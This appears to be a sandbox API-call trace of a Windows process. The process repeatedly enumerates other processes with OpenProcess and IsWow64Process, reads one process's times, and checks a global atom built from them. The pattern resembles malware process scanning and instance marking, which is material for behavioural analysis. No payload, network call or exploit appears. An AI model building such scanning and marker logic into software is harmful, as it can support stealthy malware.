	[0111.427] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0111.427] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.427] CloseHandle (hObject=0x694) returned 1
	[0111.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.427] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.427] CloseHandle (hObject=0x694) returned 1
	[0111.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.428] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.428] CloseHandle (hObject=0x694) returned 1
	[0111.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.428] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.428] CloseHandle (hObject=0x694) returned 1
	[0111.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0111.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0111.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0111.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0111.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0111.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0111.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0111.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0111.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0111.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0111.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0111.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0111.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0111.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0111.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0111.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0111.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0111.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0111.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0111.503] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.503] CloseHandle (hObject=0x694) returned 1
	[0111.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0111.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0111.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0111.504] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.504] CloseHandle (hObject=0x694) returned 1
	[0111.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0111.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0111.504] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.504] CloseHandle (hObject=0x694) returned 1
	[0111.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0111.505] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.505] CloseHandle (hObject=0x694) returned 1
	[0111.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0111.505] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.505] CloseHandle (hObject=0x694) returned 1
	[0111.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0111.505] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.505] CloseHandle (hObject=0x694) returned 1
	[0111.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0111.505] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.505] CloseHandle (hObject=0x694) returned 1
	[0111.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0111.505] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.505] CloseHandle (hObject=0x694) returned 1
	[0111.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0111.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0111.506] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.506] CloseHandle (hObject=0x694) returned 1
	[0111.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0111.506] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.506] CloseHandle (hObject=0x694) returned 1
	[0111.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0111.506] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.506] CloseHandle (hObject=0x694) returned 1
	[0111.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0111.506] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.506] CloseHandle (hObject=0x694) returned 1
	[0111.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0111.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.507] CloseHandle (hObject=0x694) returned 1
	[0111.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0111.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.507] CloseHandle (hObject=0x694) returned 1
	[0111.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0111.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.507] CloseHandle (hObject=0x694) returned 1
	[0111.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0111.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.507] CloseHandle (hObject=0x694) returned 1
	[0111.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0111.507] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.507] CloseHandle (hObject=0x694) returned 1
	[0111.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0111.508] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.508] CloseHandle (hObject=0x694) returned 1
	[0111.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0111.508] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.508] CloseHandle (hObject=0x694) returned 1
	[0111.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0111.508] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.508] CloseHandle (hObject=0x694) returned 1
	[0111.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0111.508] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.508] CloseHandle (hObject=0x694) returned 1
	[0111.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0111.508] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.508] CloseHandle (hObject=0x694) returned 1
	[0111.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0111.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.509] CloseHandle (hObject=0x694) returned 1
	[0111.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0111.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.509] CloseHandle (hObject=0x694) returned 1
	[0111.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0111.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.509] CloseHandle (hObject=0x694) returned 1
	[0111.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0111.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.509] CloseHandle (hObject=0x694) returned 1
	[0111.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0111.509] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.509] CloseHandle (hObject=0x694) returned 1
	[0111.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0111.510] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.510] CloseHandle (hObject=0x694) returned 1
	[0111.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0111.510] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.510] CloseHandle (hObject=0x694) returned 1
	[0111.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0111.510] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.510] CloseHandle (hObject=0x694) returned 1
	[0111.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.510] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.510] CloseHandle (hObject=0x694) returned 1
	[0111.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.511] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.511] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0111.511] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0111.511] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0111.512] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.512] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0111.512] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.512] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0111.512] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0111.512] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.512] CloseHandle (hObject=0x694) returned 1
	[0111.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.513] CloseHandle (hObject=0x694) returned 1
	[0111.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.513] CloseHandle (hObject=0x694) returned 1
	[0111.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.513] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.513] CloseHandle (hObject=0x694) returned 1
	[0111.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0111.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0111.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0111.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0111.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0111.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0111.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0111.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0111.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0111.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0111.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0111.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0111.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0111.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0111.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0111.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0111.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0111.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0111.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0111.607] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.607] CloseHandle (hObject=0x694) returned 1
	[0111.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0111.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0111.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0111.608] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.608] CloseHandle (hObject=0x694) returned 1
	[0111.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0111.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0111.608] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.608] CloseHandle (hObject=0x694) returned 1
	[0111.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0111.608] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.609] CloseHandle (hObject=0x694) returned 1
	[0111.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0111.609] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.609] CloseHandle (hObject=0x694) returned 1
	[0111.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0111.609] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.609] CloseHandle (hObject=0x694) returned 1
	[0111.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0111.609] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.609] CloseHandle (hObject=0x694) returned 1
	[0111.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0111.609] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.609] CloseHandle (hObject=0x694) returned 1
	[0111.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0111.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0111.610] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.610] CloseHandle (hObject=0x694) returned 1
	[0111.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0111.610] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.610] CloseHandle (hObject=0x694) returned 1
	[0111.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0111.610] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.610] CloseHandle (hObject=0x694) returned 1
	[0111.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0111.610] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.610] CloseHandle (hObject=0x694) returned 1
	[0111.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0111.611] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.611] CloseHandle (hObject=0x694) returned 1
	[0111.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0111.611] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.611] CloseHandle (hObject=0x694) returned 1
	[0111.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0111.611] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.611] CloseHandle (hObject=0x694) returned 1
	[0111.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0111.611] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.611] CloseHandle (hObject=0x694) returned 1
	[0111.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0111.611] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.611] CloseHandle (hObject=0x694) returned 1
	[0111.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0111.612] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.612] CloseHandle (hObject=0x694) returned 1
	[0111.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0111.612] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.612] CloseHandle (hObject=0x694) returned 1
	[0111.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0111.612] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.612] CloseHandle (hObject=0x694) returned 1
	[0111.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0111.612] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.612] CloseHandle (hObject=0x694) returned 1
	[0111.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0111.613] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.613] CloseHandle (hObject=0x694) returned 1
	[0111.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0111.613] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.613] CloseHandle (hObject=0x694) returned 1
	[0111.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0111.613] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.613] CloseHandle (hObject=0x694) returned 1
	[0111.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0111.613] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.613] CloseHandle (hObject=0x694) returned 1
	[0111.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0111.613] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.613] CloseHandle (hObject=0x694) returned 1
	[0111.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0111.614] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.614] CloseHandle (hObject=0x694) returned 1
	[0111.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0111.614] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.614] CloseHandle (hObject=0x694) returned 1
	[0111.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0111.614] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.614] CloseHandle (hObject=0x694) returned 1
	[0111.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0111.614] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.614] CloseHandle (hObject=0x694) returned 1
	[0111.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.614] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.614] CloseHandle (hObject=0x694) returned 1
	[0111.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.615] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0111.615] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0111.615] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0111.616] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.616] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0111.616] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.616] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0111.616] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0111.616] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.824] CloseHandle (hObject=0x694) returned 1
	[0111.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.824] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.825] CloseHandle (hObject=0x694) returned 1
	[0111.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.825] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.825] CloseHandle (hObject=0x694) returned 1
	[0111.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.825] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.825] CloseHandle (hObject=0x694) returned 1
	[0111.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0111.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0111.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0111.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0111.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0111.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0111.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0111.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
